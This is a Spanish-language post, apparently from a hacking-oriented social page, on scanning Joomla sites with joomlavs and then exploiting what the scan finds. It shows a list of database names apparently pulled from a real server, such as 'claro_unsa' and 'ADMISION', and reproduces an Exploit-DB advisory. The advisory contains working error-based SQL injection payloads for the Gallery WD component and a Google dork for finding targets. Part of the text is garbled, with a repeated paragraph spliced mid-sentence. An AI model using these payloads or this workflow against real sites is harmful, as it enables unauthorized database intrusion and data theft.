Auditando Website Joomla con joomlavs
Saludos hermanos de facebook, estuve revisando algunos mensajes de algunos usuarios que me pedian que elabore un POST sobre "Analisis de vulnerabilidades en el CMS JOOMLA", bueno empecemos.
Joomlavs es una aplicación de Ruby que puede ayudar a automatizar la evaluación de lo vulnerabilidades. puede buscar vulnerabilidades en los componentes, módulos y plantillas, así como las vulnerabilidades que existen dentro de Joomla en sí.
Descargamos el repositorio:
codigo:
git clone https://github.com/rastating/joomlavs.git
Instalamos Bundler.
codigo:
sudo gem install bundler && bundle install
Instalamos algunas dependencias, entre ellas Nokogiri
codigo:
sudo apt-get install build-essential patch
sudo apt-get install ruby-dev zlib1g-dev liblzma-dev libcurl4-openssl-dev
Auditaremos el servidor de manera "Estandar"
codigo:
root@kali:~/joomlavs# ./joomlavs.rb --scan-all --url http://www.paginaweb.com/
Encuentran los modulos vulnerables, se van a Exploit DB y al final un buen
Pentest.
Son las 03:04 de la madrugada y no voy a teste
Saludos hermanos de facebook, estuve revisando algunos mensajes de algunos usuarios que me pedian que elabore un POST sobre "Analisis de vulnerabilidades en el CMS JOOMLA", bueno empecemos.
Joomlavs es una aplicación de Ruby que puede ayudar a automatizar la evaluación de lo vulnerabilidades. puede buscar vulnerabilidades en los componentes, módulos y plantillas, así como las vulnerabilidades que existen dentro de Joomla en sí.
ar exploit por exploit xD!
available databases [12]:
ADMISION
cacti
claro_unsa
claroline
DB_CERCAP
information_schema
mysql
ocsweb
seis
SICONIN
test
unsa_AA0001
En mi opinión esta herramienta es muy util.
encontramos fallas como SQL Injection Vulnerability y nos envia las siguientes posibilidades Reference: https://www.exploit-db.com/exploits/31459 , el cual nos envia a la siguiente pagina para sacar los Exploits. y nos envia la siguiente y posible vulneravilidad dada
######################################################################
# Exploit Title: Joomla Gallery WD - SQL Injection Vulnerability
# Google Dork: inurl:option=com_gallery_wd
# Date: 29.03.2015
# Exploit Author: CrashBandicot (@DosPerl)
# Vendor HomePage: http://web-dorado.com/
# Source Component : http://extensions.joomla.org/extensions/extension/photos-a-images/galleries/gallery-wd
# Tested on: Windows
######################################################################
parameter 'theme_id' in GET vulnerable
# Example :
# Parameter: theme_id (GET)
# Type: error-based
# GET Payload : index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2&theme_id=1 AND (SELECT 6173 FROM(SELECT COUNT(*),CONCAT(0x716b627871,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
# ==================================================================================== #
parameter 'image_id' in POST vulnerable
# Example :
# URI : /index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2
# Parameter: image_id (POST)
# Type: error-based
# POST Payload: image_id=19 AND (SELECT 6173 FROM(SELECT COUNT(*),CONCAT(0x716b627871,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&rate=&ajax_task=save_hit_count&task=gallerybox.ajax_search
# ~ Demo ~ # $>
#EOF